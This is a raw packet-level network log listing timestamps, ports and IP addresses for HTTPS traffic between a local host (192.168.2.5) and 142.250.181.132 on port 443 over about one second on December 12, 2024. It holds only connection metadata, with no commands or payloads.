Dec 12, 2024 22:40:21.010152102 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.010159969 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.018507004 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.018573999 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.019126892 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.068730116 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.068758965 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.088085890 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.088152885 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.088203907 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.097120047 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.097157955 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.097174883 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.097204924 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.097250938 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.105900049 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.113487005 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.113542080 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.113543987 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.113574028 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.113612890 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.122905016 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.134622097 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.134659052 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.134680033 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.134741068 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.134769917 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.134804964 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.154105902 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.154227972 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.154254913 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.170610905 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.170680046 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.170703888 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.181484938 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.181580067 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.181610107 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.189028025 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.189099073 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.189121008 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.198215961 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.198292971 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.198306084 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.206758976 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.206868887 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.206883907 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.216645956 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.216733932 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.216752052 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.226553917 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.226646900 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.226665020 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.227891922 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.227972984 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.289355040 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.289463043 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.289544106 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.289555073 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.289586067 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.289634943 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.289669037 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.302217007 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.302326918 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.302351952 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.302383900 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.302436113 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.308542967 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.321048975 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.321146965 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.321203947 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.409252882 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.409310102 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.409332991 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.453191996 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.453216076 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.460833073 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.480779886 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.485693932 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.485753059 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.485769033 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.495177031 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.495234966 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.495245934 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.508949995 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.509021044 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.509036064 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.518657923 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.519345999 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.519356966 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.519370079 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.519413948 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.522527933 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.522586107 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.522597075 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.535897970 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.535968065 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.535976887 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.549796104 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.549834967 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.549861908 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.549873114 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.549916029 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.562225103 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.575730085 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.575792074 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.575798035 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.575809956 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.575870037 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.587578058 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.600244999 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.600311995 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.600330114 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.612832069 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.612879038 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.612899065 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.612915993 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.612962008 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.616121054 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.673223972 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.673288107 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.673333883 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.679132938 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.679198027 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.679229975 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.682775974 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.682832956 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.682857037 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.689578056 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.689637899 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.689665079 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.694966078 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.695101976 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.695123911 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.705569983 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.705629110 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.705653906 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.716833115 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.716890097 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.716916084 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.728291988 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.728353024 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.728370905 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.739722013 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.739783049 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.739814043 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.751065969 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.751151085 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.751183987 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.763025999 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.763123989 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.763133049 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.773382902 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.773428917 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.773446083 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.783696890 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.783767939 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.783803940 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.793637991 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.793723106 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.793731928 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.803894997 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.803960085 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.803967953 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.813076973 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.813213110 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.813225031 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.822063923 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.822119951 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.822129011 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.830713987 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.830770969 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.830780029 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.838968992 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.839057922 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.839474916 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.839484930 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.839765072 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.847405910 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.855777979 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.855850935 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.855869055 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.855900049 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.856002092 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.863811970 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.870980024 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.871073961 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.871092081 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.873925924 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.873986006 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.874003887 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.878969908 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.879014969 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.879023075 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.884023905 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.884083986 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.884093046 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.888999939 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.889050961 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.889058113 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.894222975 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.894311905 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.894313097 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.894336939 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.894406080 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.899059057 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.900373936 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.900428057 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.900437117 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.904335022 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.904505014 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.904512882 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.909138918 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.909280062 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.909287930 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.914266109 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.914329052 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.914339066 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.919218063 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.919302940 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.919333935 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.924124956 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.924173117 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.924189091 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.929105043 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.929164886 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.929174900 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.934060097 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.934106112 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.934114933 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.939374924 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.940375090 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.940449953 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.940460920 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.940510988 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.943926096 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.948890924 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.948936939 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.948957920 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.955194950 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.955310106 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.955354929 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.958679914 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.958760023 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.958775043 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.965281963 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.965338945 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.965349913 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.968369007 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.968429089 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.968436003 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.988091946 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.988183975 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.988190889 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.989254951 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.989312887 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.989319086 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.991368055 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.991565943 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.991573095 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.993614912 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.993685961 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.993700981 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.996964931 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.997064114 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.997072935 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.997087002 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.997298002 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.999206066 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.999361992 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.999413013 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:21.999422073 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.005166054 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.005259037 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.005292892 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.006292105 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.006357908 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.006367922 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.014238119 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.014302969 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.014312983 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.015594959 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.015667915 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.015676975 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.022759914 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.022846937 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.022855997 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.024286985 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.024333000 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.024342060 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.030966997 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.031023026 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.031030893 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.033680916 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.033732891 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.033741951 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.039479017 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.039560080 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.039570093 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.042413950 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.042464972 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.042474031 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.050121069 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.050170898 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.050183058 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.052057028 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.052100897 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.052110910 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.055807114 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.055875063 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.055883884 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.059323072 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.059369087 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.059377909 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.062830925 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.062891006 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.062899113 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.066519022 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.066564083 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.066572905 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.070092916 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.070167065 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.070178032 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.073545933 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.073602915 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.073612928 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.076951981 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.077003002 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.077012062 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.080461025 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.080548048 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.080557108 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.083719969 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.083903074 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.083911896 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.087085009 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.087141991 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.087151051 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.090094090 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:22.090162992 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:22.090172052 CET	443	49726	142.250.181.132	192.168.2.5
